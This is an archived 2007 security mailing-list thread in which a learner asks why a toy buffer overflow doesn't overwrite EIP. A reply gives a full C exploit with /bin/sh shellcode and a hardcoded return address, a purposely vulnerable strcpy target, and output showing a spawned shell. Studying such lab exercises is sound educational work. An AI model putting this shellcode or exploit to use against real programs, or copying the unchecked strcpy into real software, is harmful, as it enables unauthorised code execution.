Vuln Dev
Re: understanding buffer overflows Nov 01 2007 02:01PM
adimitro gmail com
Try this.. it is in C but you shouldn't have problems rewriting it..

In your example you are overrunning the buffer but you might not be overwriting the EIP .. try a bigger buffer

--

Best Regards,

Atanas

/*

Overflow written for:

x86 Pentium 4

Linux version 2.6.5-7.104-default

gcc version 3.3.3

SuSE Linux

*/

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#define MAX_BUF 530

#define RETADDR 0xbffff0c0

int main()

{

int i;

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char buffer[MAX_BUF];

// fill the buffer with the return address

//the address to be overwritten is 524 bytes from the addr of buffer

for (i=0; i<MAX_BUF; i+=4)

*(long *)&buffer[i] = RETADDR;

memcpy(buffer, shellcode, sizeof(shellcode));

buffer[sizeof(shellcode)-1]='A'; //take care of an extra 0x00

// I compiled the code provided as "vuln"

execlp("./vuln", "vuln", buffer, NULL);

exit(0);

}

/*

OUTPUT:

***@localhost:~> ./test

sh-2.05b$ exit

exit

***@localhost:~>

*/

OVERFLOWN CODE:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int foo (char *input)

{

char buffer [512];

strcpy(buffer, input);

return (0);

}

int main (int argc, char * argv[])

{

if (argc > 1)

foo(argv[1]);

else

printf("usage: %s string", argv[0]);

exit (0);

}

- Show quoted text -

On 31 Oct 2007 14:36:22 -0000, secacc7 (at) hotmail (dot) com [email concealed] <secacc7 (at) hotmail (dot) com [email concealed]> wrote:

hello, my name is michael, im from austria - so my english is very bad.

A few days ago i begin to experiment with bufferoverflows in linux.

i wrote a little c++ programm like this:

#include < string.h>

void main()

{

char buffer[10];

char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";

strcpy((char *)buffer,(char *)COPY);

}

k, this works very well, i got a core dump and have startet gdb. but in the output from "info all" was eip not overwritten

so i put a few lines in the program to output addresses from functions and variables.

addresses from functions where over 0 (eg (dec)500000) and addresses from vars under 0 (eg -5000000)

i think this is maybe the problem - but why?

output from gdb:

eax 0x0 0

ecx 0x41414141 1094795585

edx 0x1d7 471

ebx 0xb7e27ff4 -1209892876

esp 0x4141413d 0x4141413d

ebp 0x41414141 0x41414141

esi 0xb7f77ce0 -1208517408

edi 0x0 0

eip 0x80484ad 0x80484ad

eflags 0x210286 [ PF SF IF RF ID ]

cs 0x73 115

ss 0x7b 123

ds 0x7b 123

es 0x7b 123

fs 0x0 0

gs 0x33 51

hope anybody can help me understand/learn.

greets from austria, michael

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus